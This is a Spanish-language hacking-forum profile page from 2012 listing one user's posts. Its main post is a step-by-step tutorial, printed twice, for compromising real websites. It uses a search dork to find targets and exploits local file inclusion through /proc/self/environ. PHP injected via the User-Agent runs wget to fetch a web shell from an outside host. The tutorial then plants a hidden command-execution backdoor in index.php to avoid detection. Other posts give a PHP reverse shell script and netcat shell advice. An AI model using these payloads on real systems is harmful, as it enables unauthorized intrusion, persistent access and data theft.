Primero que nada estas en la seccion equivocada, porq lo q quieres hacker segun dices es un Servidor, que corre Servicios, que pueden o no ser Vulnerables, pasate por la seccion WebApps Security And Hacking, busca informacion de redes y protocolos, Que es un servicio, los puertos donde corren, si la la web es vulnerable a SQL Injectio, Local File Incusion, Remote File Inclusion, Si puedes Listar Contenido Arbitrariamente, Si Puedes Descargar Archivos en base a un fallo de filtrado en Download.php (archivo de descarga, el nombre puede variar), si es vulnerable a XSS o a CSRF, intentar conocer la estructura de Directorios del Servidor, Puedes Hacerlo con Wget o DirBuster, buscar las versiones de los servicios q se ejecutan en cada puerto y buscar algun fallo en ellos, revisar si la cabeza HTTP Filtra PUT, Tienes mucho q investigar, ningun manual ni programa te va a decir la pura verdad, tu lee todo lo q encuentres y create tus propias ideas, estrategias, aprende algo de Scripting para armarte algunas herramientas, aprende lo q es una WebShell, aprende lo necesario de Perl y PHP aunq sea minimo para poder enteder q hace una web al ejecutarce (esta de mas decir html, asp, etc), estudia no te larges de una a jugartelas de hacker, porq van a pasar 2 cosas, vas a usar herramientas y nisiquiera vas a saber q estas haciendo y no vas a lugrar ningun resultado mas q sentirte ignorante, o q si logras algo y no estas detras de un proxy o vpn te caiga la Policia, o te demanden, o simplemente no concigas lo q buscaste. Aqui Cite algunos de los Ataques q deberias Aprender, tambien existe SSI (Server Side Injection), leete los papers que ahi en la seccion sobre PHP:Input y Proc/self/environ para explitar LFI, Saludos y Que Nunca Muera tu Curiosidad, porq eso hace al hacker por eso se dice q el hacker nace, porq el hacker tiene la peculiar caracteristica de ser muy curioso y busca comprender el funcionamiento todo, y la poblacion General carece de Curiosidad
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#283
Diseño UX/UI / Re:Pide tu firma Underc0de!
Julio 21, 2012, 06:06:33 PM
Podrian hacerme una q ademas diga mi blog? esta genial la idea!
#284
Pentesting / Re:Sensitive Buster v1.0 - r00tw0rm Coders
Julio 19, 2012, 01:36:01 AM
Ya la Probe Muy Buena, Se Agradece!
#285
Bugs y Exploits / Re:WordPress Security Fingerprinter Exploit-DB
Julio 18, 2012, 01:23:32 AM
Se Desvio del Tema Central
#286
Bugs y Exploits / Re:Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdorizar
Julio 17, 2012, 12:35:31 AM
Con un RFI solo es necesario tener un archivo con una WebShell en algun servidor para llamarlo directamente desde el RFI.
#287
Bugs y Exploits / Re:WordPress Security Fingerprinter Exploit-DB
Julio 16, 2012, 10:47:57 PM
Buen Aporte! gracias!
#288
Bugs y Exploits / Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdoorizar
Julio 16, 2012, 09:11:15 PM
Leyendo el Post de CalebBuker sobre LFI atrasves de No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
desidi hacer un tutorial de otro metodo para concegir subir una shell por medio de LFI
utilizando injecciones php atraves de una vulnerabilidad en el /proc/self/environ
Empecemos:
Primero Buscamos con un dork alguna web Vulnerable a LFI
Dork:
inurl:*.php?page=* site:.com.ar
Vamos probando hasta encontrar una q al incluir /etc/passwd nos muestra su contenido
En este caso:
http://sitiovulnerable/index.php?page=/etc/passwd
![](http://i48.tinypic.com/wul7w3.png)
Damos como parametro a incluir /proc/self/environ y vemos el siguien resultado
http://sitiovulnerable/index.php?page=/proc/self/environ
![](http://i45.tinypic.com/1zv9749.png)
Nos vamos a Mozilla Firefox y abrimos el addon Tamper Data:
Damos clik en Start Tamper y volvemos a realizar la Peticion al sitio web
Atrapa el Primer "pakete" y nos sale el siguiente cartel
![](http://i48.tinypic.com/2zgw01v.png)
Desactivamos la casilla "Continue Tampering" y Damos Click en Tamper, modificamos el Parametro User-Agent intrudiciendo algun Codigo php, de Prueba, Yo intentare con <? System('ls'); ?> para ver si logramos listar el contenido de host.
![](http://i50.tinypic.com/2zqh7gm.png)
Damos Click en OK y vemos q el codigo php se ejecuta correctamente y lista los archivos y directorios de la web Vulnerable:
![](http://i45.tinypic.com/aya984.png)
Ahora Sabemos que se puede ejecutar Codigo Shell atraves de php con el comando system,exec,etc (si no funcionace reciviriamos un mensaje diciendo q la funcion system() a sido deshabilitada por razones de seguridad)
Subiremos Nuestra Shell, de la siguiente forma.
Abriremos Tamper Data y comensaremos a Capturar.
Repetiremos la Peticion al host:
http://sitiovulnerable/index.php?page=/proc/self/environ
Modificaremos el Parametro User-Agent para que ejecute Wget y descarge una shell en txt de donde sea que este alojada con el siguiente codigo php
<? system('wget http://SitioDeLaShell/shell.txt'); ?>
![](http://i45.tinypic.com/34hc76w.png)
Repetimos la Operacion Con Tamper Data y Comprobamos q nuestra shell se subio correctamente pasando como parametro en User-Agent
<? system('ls'); ?>
Vemos que dentro de la lista de archivos del host aparece nuestra shell
![](http://i47.tinypic.com/qpl2eb.png)
Convertiremos Nuestro txt, en un archivo php, repitiendo la operacion con Tamper Data y pasando como Parametro de User-Agent
<? system('mv c99.txt s.php'); ?>
Una ves Hecho Esto repetimos el procedimiento con tamper data para listar nuestros archivos, para ver si el proceso anterior Termino Correctamente:
<? system('ls'); ?>
![](http://i50.tinypic.com/10podc1.png)
Como vemos el archivo fue Renombrado Correctamente, solo nos queda vistar nuestro archivo por medio de la URL
http://sitiovulerable/s.php
)
Como vemos la ejecucion de la shellphp, se ejecuto Correctamente. Como es un Sitio Importante y no queremos q nos detecten, introduciremos un backdoor dentro del codigo de algun archivo, yo elegi index.php
![](http://i45.tinypic.com/2ytv09i.png)
Les Dejo el code del backdoor q arme:
Código: text
Lo Introduciremos dentro de index.php y al llamarlo desde
http://SutioVulnerable/index.php?c=ls&active=si
nos mostrara el resultado de la ejecucion del parametro q pasemos.
![](http://i48.tinypic.com/25in68w.png)
Solo nos queda Eliminar s.php con el comando rm s.php por medio de nuestro backdoor
http://SutioVulnerable/index.php?c=rm s.php&active=si
Listamos el Contenido del Host
http://SutioVulnerable/index.php?c=ls&active=si
y vemos q s.php ha desaparecido.
![](http://i50.tinypic.com/jk8siq.png)
Espero que este tutorial les halla servido, HD_Breaker
Renuncia: No me hago Responsable del Uso que le den a este tutorial, su contenido es puramente educativo
desidi hacer un tutorial de otro metodo para concegir subir una shell por medio de LFI
utilizando injecciones php atraves de una vulnerabilidad en el /proc/self/environ
Empecemos:
Primero Buscamos con un dork alguna web Vulnerable a LFI
Dork:
inurl:*.php?page=* site:.com.ar
Vamos probando hasta encontrar una q al incluir /etc/passwd nos muestra su contenido
En este caso:
http://sitiovulnerable/index.php?page=/etc/passwd
![](http://i48.tinypic.com/wul7w3.png)
Damos como parametro a incluir /proc/self/environ y vemos el siguien resultado
http://sitiovulnerable/index.php?page=/proc/self/environ
![](http://i45.tinypic.com/1zv9749.png)
Nos vamos a Mozilla Firefox y abrimos el addon Tamper Data:
Damos clik en Start Tamper y volvemos a realizar la Peticion al sitio web
Atrapa el Primer "pakete" y nos sale el siguiente cartel
![](http://i48.tinypic.com/2zgw01v.png)
Desactivamos la casilla "Continue Tampering" y Damos Click en Tamper, modificamos el Parametro User-Agent intrudiciendo algun Codigo php, de Prueba, Yo intentare con <? System('ls'); ?> para ver si logramos listar el contenido de host.
![](http://i50.tinypic.com/2zqh7gm.png)
Damos Click en OK y vemos q el codigo php se ejecuta correctamente y lista los archivos y directorios de la web Vulnerable:
![](http://i45.tinypic.com/aya984.png)
Ahora Sabemos que se puede ejecutar Codigo Shell atraves de php con el comando system,exec,etc (si no funcionace reciviriamos un mensaje diciendo q la funcion system() a sido deshabilitada por razones de seguridad)
Subiremos Nuestra Shell, de la siguiente forma.
Abriremos Tamper Data y comensaremos a Capturar.
Repetiremos la Peticion al host:
http://sitiovulnerable/index.php?page=/proc/self/environ
Modificaremos el Parametro User-Agent para que ejecute Wget y descarge una shell en txt de donde sea que este alojada con el siguiente codigo php
<? system('wget http://SitioDeLaShell/shell.txt'); ?>
![](http://i45.tinypic.com/34hc76w.png)
Repetimos la Operacion Con Tamper Data y Comprobamos q nuestra shell se subio correctamente pasando como parametro en User-Agent
<? system('ls'); ?>
Vemos que dentro de la lista de archivos del host aparece nuestra shell
![](http://i47.tinypic.com/qpl2eb.png)
Convertiremos Nuestro txt, en un archivo php, repitiendo la operacion con Tamper Data y pasando como Parametro de User-Agent
<? system('mv c99.txt s.php'); ?>
Una ves Hecho Esto repetimos el procedimiento con tamper data para listar nuestros archivos, para ver si el proceso anterior Termino Correctamente:
<? system('ls'); ?>
![](http://i50.tinypic.com/10podc1.png)
Como vemos el archivo fue Renombrado Correctamente, solo nos queda vistar nuestro archivo por medio de la URL
http://sitiovulerable/s.php
![](http://i50.tinypic.com/2n8redl.png)
Como vemos la ejecucion de la shellphp, se ejecuto Correctamente. Como es un Sitio Importante y no queremos q nos detecten, introduciremos un backdoor dentro del codigo de algun archivo, yo elegi index.php
![](http://i45.tinypic.com/2ytv09i.png)
Les Dejo el code del backdoor q arme:
<?php
if($_GET['active']=='si'){
system( $_GET['c']);
}
?>
Lo Introduciremos dentro de index.php y al llamarlo desde
http://SutioVulnerable/index.php?c=ls&active=si
nos mostrara el resultado de la ejecucion del parametro q pasemos.
![](http://i48.tinypic.com/25in68w.png)
Solo nos queda Eliminar s.php con el comando rm s.php por medio de nuestro backdoor
http://SutioVulnerable/index.php?c=rm s.php&active=si
Listamos el Contenido del Host
http://SutioVulnerable/index.php?c=ls&active=si
y vemos q s.php ha desaparecido.
![](http://i50.tinypic.com/jk8siq.png)
Espero que este tutorial les halla servido, HD_Breaker
Renuncia: No me hago Responsable del Uso que le den a este tutorial, su contenido es puramente educativo
#289
Bugs y Exploits / Re:Admin generosos, Sessions, Hash Cracking y Moodle
Julio 16, 2012, 02:47:45 PM
Buen Aporte, Gracias!
#290
Bugs y Exploits / Re:Subiendo Shell Explotando LFI via PHP:INPUT
Julio 15, 2012, 09:46:33 PM
Exelente Aporte!
#291
Bugs y Exploits / Re:Intrusión a un Servidor Por SQLi y Obtener shell
Julio 14, 2012, 05:05:10 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Que onda man! bueno andaba probando y mire tu shell pero no pude entrar aunque los datos para entrar a tu shell fueran user y pass no pude! pero bueno entonces lo que hice fue en la shell que estaba utilizando la c99 le di en bind ahi dice para conectarse bind o backconnect bueno intente con el backconnect pero nada! entonces intente con la bind y cuando estoy conectandome en el netcat me manda conecction refused!
delta.xxxxxxxxx.com.ar [176.31.77.xxx] 11xxx (?): connection refused
Me podrias decir que puedo hacer!
ah por cierto quise intentar subir el reversheshell que pusistes en el server pero no lo encontre no me lo da en el directorio me podrias pasar el nombre de tu shell? para probar igualmente gracias me parecio interesante el articulo y quise probar je! saludos
Con un bind coneccion muy rara ves vas a tener shell, ya que depende de q el puerto este desocupado y al mismo tiempo abierto en el router/modem cosa q muy rara vez pasa, y la reverse shell q puse esta en perl y la tienes q ejecutar con, perl host puerto -l (para linux) -w (para windows)
#292
Bugs y Exploits / Re:Intrusión a un Servidor Por SQLi y Obtener shell
Julio 13, 2012, 02:51:17 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
he probado con los puertos 888 y 31337 también, aquí te dejo la prueba de que está abierto:
y el netcat lo dejo asi:
Saludos y gracias
Caundo usas el reverse shell apuntas a tu no-ip, dyndns, etc??
#293
Back-end / Re:Php Reverse Shell Socket Duda.
Julio 13, 2012, 12:20:53 AM
Creo haberlo reparado, ahora no tengo la posibilidad de testearlo porq no estoy en mi casa y no cuento con una ip fija, si alguien lo prueba escriba si funciono, Gracias Cronos!
#294
Bugs y Exploits / Re:Intrusión a un Servidor Por SQLi y Obtener shell
Julio 11, 2012, 04:48:10 PM
Tenes q usar numeros de puertos altos en el netcat, si no tienes una ip fija debes correr algun servicio como No-Ip o DynDns para mantener tu ip Dynamica aputando a un host, y tener los puertos q abris con netcat en tu pc, abiertos en el modem/router.
#295
Back-end / Php Reverse Shell Socket Duda.
Julio 11, 2012, 04:33:57 PM
Bueno Arme esta php shell que en un principio no me funcionaba, gracias a la ayuda de Cronos creo q quedo funcionando, apenas pueda la pruebo!
Código: php
<html>
<body>
<center>
<form method="post">
Ip:<br>
<input name="ip" type="text" id="ip"/><br>
Port:<br>
<input name="port" type="text" id="port"/><br>
<input type="submit" value="submit"/>
</form>
</center>
</body>
</html>
<?php
$ip = $_POST['ip'];
$port = $_POST['port'];
if($ip != "" && $ip != 0) {
$sock = fsockopen ("$ip", $port);
fputs($sock, "Password: ");
}
while($cmd != 0) {
$log = fgets($sock, $port);
$log2 = md5($log);
if($log2 == "5e2c8ac9008420e9ac3c008bef292c01") {
fputs($sock, "Comando: ");
$cmd = fgets($sock, $port);
if($cmd) {
$result = shell_exec('$cmd');
fputs($sock, "$result");
}}else{
echo "Acceso Denegado";
}}
?>
#296
Back-end / Re:Mailer PHP HD_Breaker
Julio 11, 2012, 04:30:20 PM
Disculpa, lo tenia colocado en el servidor y no en el archivo de mi disco.
Steal IP:
Código: php
eso simplemente y nos queda ordenado en el archivo ip.txt, yo lo agrege al mai.php
Steal IP:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$fp = fopen("ip.txt","a");
fwrite($fp, "Ip: $ip" . PHP_EOL);
fclose($fp);
?>
eso simplemente y nos queda ordenado en el archivo ip.txt, yo lo agrege al mai.php
#297
Back-end / Re:Mailer PHP HD_Breaker
Julio 09, 2012, 11:01:28 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pues nop, aparece la sgte descarga no està disponible No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | 0.00 MB
ademas de que no sale q tenga peso alguno, si ves sale 0.00 MB.....
Ante la duda lo subi a filefactory
#298
Back-end / Re:Mailer PHP HD_Breaker
Julio 09, 2012, 10:29:22 PM
El link funciona a la perfeccion
#299
Arduino - Raspberry PI / Re:[Book] 30 Proyectos Arduino para genios malvados :-)
Julio 09, 2012, 07:25:21 PM
Muy bueno Gracias!
#300
Back-end / Mailer PHP HD_Breaker
Julio 09, 2012, 07:16:57 PM
Bueno, comencé a aprender php, y decidi armar un Mailer.
Tiene un Panel de Acceso y un Steal de IP por si algún Agente no deseado logra acceder, uds posean su ip.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
![](http://i47.tinypic.com/2r7qzkh.png)
Link Reparado Se agrego funcion html y Lista de Correos
Tiene un Panel de Acceso y un Steal de IP por si algún Agente no deseado logra acceder, uds posean su ip.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
![](http://i47.tinypic.com/2r7qzkh.png)
Link Reparado Se agrego funcion html y Lista de Correos